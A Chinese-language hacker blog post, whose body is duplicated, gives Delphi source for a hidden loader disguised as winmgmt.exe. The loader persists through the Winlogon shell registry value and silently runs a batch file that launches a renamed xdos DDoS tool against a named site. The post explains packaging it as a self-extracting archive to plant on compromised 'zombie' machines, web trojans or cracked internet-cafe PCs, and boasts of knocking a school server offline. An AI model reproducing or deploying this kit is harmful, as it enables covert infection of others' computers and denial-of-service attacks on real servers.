2005-12-09 15:39:20 by: h4x0r
打造简单隐藏疯狂DDoS攻击工具
文章作者:风尘浪子
信息来源:h4x0r's blog
xdos攻击效果是比较好的了,但是我们要做的是让他象教主的僵尸那样,放在很多肉鸡上运行,自动攻击目标服务器。xdos运行有cmd窗口,我们可以用delphi写个小程序让他隐藏窗口,并且实现开机自启动。
下面是源代码,很简单,编译成winmgmt.exe
program Project1;
uses
SysUtils,
windows,
system,
shellapi;
var
buf:array[0..max_path] of char ;
function regs(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey); //根键,路径,
if RegSetValueEx(regkey,Pchar(name),0,REG_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
begin
getsystemdirectory(buf,max_path);
//copyfile(pchar('run.bat'),pchar(buf+'\run.bat'), FALSE);
//copyfile(pchar('mslta.exe'),pchar(buf+'\mslta.exe'), FALSE);
//copyfile(pchar('winmgmt.exe'),pchar(buf+'\winmgmt.exe'), FALSE);
regs(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows NT\CurrentVersion\Winlogon','shell','Explorer.exe '+buf+'\winmgmt.exe'); //根键,路径,子键,键值.
ShellExecute(0,'open',pchar(buf+'\run.bat'),nil,nil,SW_hide);
end.
可以看到是写到注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \CurrentVersion\Winlogon下面shell键值实现自启动,
通过ShellExecute(0,'open',pchar(buf+'\run.bat'),nil,nil,SW_hide);这一句。
隐藏运行system32下面的run.bat。
比如其run.bat内容如下:
mslta.exe www.21o.net 80 -t 20 -s *
mslta.exe就是同目录下面的xdos工具了,改个名而已。
这样写好之后,用winrar做成自解压工具,相信大家都很熟练了。
解压路径写上:
%Systemroot%/system32/
解压后运行:%Systemroot%/system32/winmgmt.exe
这样根据就做好。如果你有pcshare之类的很多肉鸡,你就可全部被他种上实现ddos.
也可以做成网页木马,让种马者来集体ddos攻击。
如果你喜欢上网吧,你可以把网吧的还原卡密码破了,装上几台来ddos.网吧网速很快,带宽大,效果也可以,上网的人也大部分是只知道玩游戏的家伙。
以上方法很简单,也有缺点,如有进程,无法远程卸载,可能导致无法控制局面。
在肉鸡上运行后,没有任何窗口啊什么的,不过cpu占用率会上升,如果机器差,影响会很大。
不过效果还可以,我用两台机器国际我们学校服务器,网站就打不开了,即使打开了也特别慢。
本文没什么技术,不过上面那个方法利用在某些场合还是可以的,希望和大家交流,本人qq:156544632。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=316
信息来源:h4x0r's blog
xdos攻击效果是比较好的了,但是我们要做的是让他象教主的僵尸那样,放在很多肉鸡上运行,自动攻击目标服务器。xdos运行有cmd窗口,我们可以用delphi写个小程序让他隐藏窗口,并且实现开机自启动。
下面是源代码,很简单,编译成winmgmt.exe
program Project1;
uses
SysUtils,
windows,
system,
shellapi;
var
buf:array[0..max_path] of char ;
function regs(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey); //根键,路径,
if RegSetValueEx(regkey,Pchar(name),0,REG_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
begin
getsystemdirectory(buf,max_path);
//copyfile(pchar('run.bat'),pchar(buf+'\run.bat'), FALSE);
//copyfile(pchar('mslta.exe'),pchar(buf+'\mslta.exe'), FALSE);
//copyfile(pchar('winmgmt.exe'),pchar(buf+'\winmgmt.exe'), FALSE);
regs(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows NT\CurrentVersion\Winlogon','shell','Explorer.exe '+buf+'\winmgmt.exe'); //根键,路径,子键,键值.
ShellExecute(0,'open',pchar(buf+'\run.bat'),nil,nil,SW_hide);
end.
可以看到是写到注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \CurrentVersion\Winlogon下面shell键值实现自启动,
通过ShellExecute(0,'open',pchar(buf+'\run.bat'),nil,nil,SW_hide);这一句。
隐藏运行system32下面的run.bat。
比如其run.bat内容如下:
mslta.exe www.21o.net 80 -t 20 -s *
mslta.exe就是同目录下面的xdos工具了,改个名而已。
这样写好之后,用winrar做成自解压工具,相信大家都很熟练了。
解压路径写上:
%Systemroot%/system32/
解压后运行:%Systemroot%/system32/winmgmt.exe
这样根据就做好。如果你有pcshare之类的很多肉鸡,你就可全部被他种上实现ddos.
也可以做成网页木马,让种马者来集体ddos攻击。
如果你喜欢上网吧,你可以把网吧的还原卡密码破了,装上几台来ddos.网吧网速很快,带宽大,效果也可以,上网的人也大部分是只知道玩游戏的家伙。
以上方法很简单,也有缺点,如有进程,无法远程卸载,可能导致无法控制局面。
在肉鸡上运行后,没有任何窗口啊什么的,不过cpu占用率会上升,如果机器差,影响会很大。
不过效果还可以,我用两台机器国际我们学校服务器,网站就打不开了,即使打开了也特别慢。
本文没什么技术,不过上面那个方法利用在某些场合还是可以的,希望和大家交流,本人qq:156544632。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=316
There is no comment on this article.
